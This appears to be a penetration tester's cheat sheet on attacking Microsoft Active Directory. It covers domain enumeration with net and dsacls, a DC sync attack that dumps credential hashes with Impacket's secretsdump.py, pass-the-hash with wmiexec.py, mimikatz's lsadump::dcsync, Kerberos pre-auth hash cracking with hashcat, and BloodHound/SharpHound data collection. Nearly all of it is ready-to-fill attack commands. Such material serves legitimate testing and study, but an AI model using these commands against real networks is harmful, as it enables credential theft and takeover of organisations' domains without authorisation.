Active Directoy
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.
-- Wikipedia

Related

Target

  • Domain Admins group
  • Domain Controller

General

Display permissions using PowerShell
dsacls "DC=<domain>,DC=<domain>"

net

List local accounts
net user
List domain accounts
net user /domain
Details about specific user
net user <user> /domain
List domain groups
net group /domain
Show domain's account policy
net accounts

DC sync attack

secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"
Alternative approach (probably gets flagged by AV) Copy & execute mimikatz.exe on DC
lsadump::dcsync

Pre-Auth attack

Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube 1. sniff KRB auth packet 2. crack using hashcat
-> If no pre auth is required, just use Impacket to pull hashes from AD.

BloodHound

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound

Gather information (on target)

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All
OR
.\SharpHound.exe -c all -d <domain> --domain-controller <dc-ip>
Copy generated *BloodHound.zip
OR
SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound
Connect to database
bolt://localhost:7687
neo4j
<PW>
Import data Upload Data select .csv, .json or .zip file(s)